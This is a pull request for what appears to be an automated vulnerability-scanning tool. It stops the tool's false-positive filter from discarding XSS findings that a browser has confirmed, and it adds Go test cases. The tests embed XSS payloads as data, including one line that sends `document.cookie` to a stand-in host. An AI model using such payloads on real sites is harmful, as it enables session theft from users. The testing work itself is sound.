### PR TITLE
Stop dropping browser-confirmed XSS as a false positive

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,10 @@
 # Changelog
 
+## [Unreleased] — Stop dropping browser-confirmed XSS as a false positive
+
+### Fixed
+- **The false-positive gate no longer rejects a browser-confirmed XSS as "reflection only."** When `verify_xss` proves execution in a real browser, it emits a machine-generated proof — `Browser-confirmed XSS: a dialog:alert dialog carrying the nonce "…" fired while loading …` — but that phrasing matched none of the gate's execution markers, while the reflected payload the agent includes (`<script>`, `onerror=`) tripped the reflection-only check, so a genuinely proven XSS was dropped (and had to be re-reported, sometimes landing as needs-manual-verification). The gate now recognizes the verifier's execution tokens (and dialog/console/DOM signal kinds), so a browser-confirmed XSS passes through to the independent verifier instead of being discarded. Surfaced by the first benchmark baseline run.
+
 ## [v4.6.21](https://github.com/xalgorix/xalgorix/releases/tag/v4.6.21) — Benchmark scoring, robustness, and a per-challenge timeout (2026-09-01)
 
 ### Changed

--- a/internal/tools/reporting/reporting.go
+++ b/internal/tools/reporting/reporting.go
@@ -1550,6 +1550,17 @@ func checkFalsePositive(title, description, severity, proof string) string {
 			"popped", "script ran", "js ran", "javascript ran", "confirmed execution",
 			"executed in the browser", "stole the cookie", "cookie was stolen", "cookie exfiltrated",
 			"session hijack", "ran in the victim",
+			// Tokens emitted ONLY by the browser XSS verifier (verify_xss /
+			// finalizeXSSVerdict) on a real nonce match — i.e. concrete
+			// browser-confirmed execution. Without these, the verifier's own
+			// confirmation string ("Browser-confirmed XSS: a dialog:alert dialog
+			// carrying the nonce … fired while loading …") matched none of the
+			// phrases above and, because the pasted payload contains <script>/
+			// onerror=, was wrongly dropped here as reflection-only. A spoofed
+			// token still faces the independent verifier (Gate 4.5) downstream.
+			"browser-confirmed xss", "carrying the nonce", "fired while loading",
+			"dialog:alert", "dialog:confirm", "dialog:prompt", "dialog:beforeunload",
+			"console:", "dom:marker",
 		}
 		hasExecution := false
 		for _, m := range executionMarkers {

--- a/internal/tools/reporting/reporting_test.go
+++ b/internal/tools/reporting/reporting_test.go
@@ -286,6 +286,25 @@ func TestCheckFalsePositive_XSSReflectionOnly(t *testing.T) {
 			"Payload <script>new Image().src='//x/?c='+document.cookie</script> fired and exfiltrated the session cookie",
 			false,
 		},
+		// Browser verifier (verify_xss) confirmation, verbatim, alongside the
+		// reflected payload the agent pastes → NOT rejected. This is the exact
+		// shape that was wrongly dropped as reflection-only before the fix.
+		{
+			"browser-confirmed xss (dialog) not rejected",
+			"Reflected XSS in q parameter (browser-confirmed execution)",
+			"q parameter executes a script",
+			"high",
+			`Browser-confirmed XSS: a dialog:alert dialog carrying the nonce "XV-8f3a" fired while loading https://app.example.com/search?q=<script>alert('XV-8f3a')</script>. Recorded in the ledger.`,
+			false,
+		},
+		{
+			"browser-confirmed xss (console/dom marker) not rejected",
+			"Reflected XSS (browser-confirmed)",
+			"payload executes",
+			"medium",
+			`Browser-confirmed XSS: a console:log dialog carrying the nonce "XV-77" fired while loading https://app/x?p=<img src=x onerror=console.log('XV-77')>.`,
+			false,
+		},
 		// Low/info severity → gate does not apply.
 		{
 			"reflection only but info severity",


### PR DESCRIPTION
A real false-negative surfaced by the first benchmark baseline run.

## Problem
When `verify_xss` proves execution in a real browser it emits the proof `Browser-confirmed XSS: a dialog:alert dialog carrying the nonce "…" fired while loading …`. That phrasing matched none of the FP gate's (Pattern 18) execution markers, while the reflected payload the agent pastes (`<script>`, `onerror=`) tripped the reflection-only check — so a genuinely proven XSS was dropped as a false positive (logs showed it rejected 3× in a row), forcing a re-report that sometimes landed as `needs-manual-verification`. The independent verifier runs *after* this gate, so it couldn't rescue it.

## Fix
Pattern 18 now recognizes the browser verifier's machine-emitted tokens (`browser-confirmed xss`, `carrying the nonce`, `fired while loading`, and the `dialog:`/`console:`/`dom:marker` signal kinds). A browser-confirmed XSS is exempt from the reflection-only rejection and proceeds to the independent verifier. These tokens are produced only by `finalizeXSSVerdict` on a real nonce match; a spoofed token still faces the downstream verifier, so it can't launder a fake finding.

## Tests
Two new cases in `TestCheckFalsePositive_XSSReflectionOnly` feed the verbatim verifier proof (dialog + console/DOM) with the reflected payload and assert NOT rejected; reflection-only and encoded-reflection cases still reject. Build, gofmt, vet, golangci-lint (0 issues), reporting suite green. Base main (v4.6.21).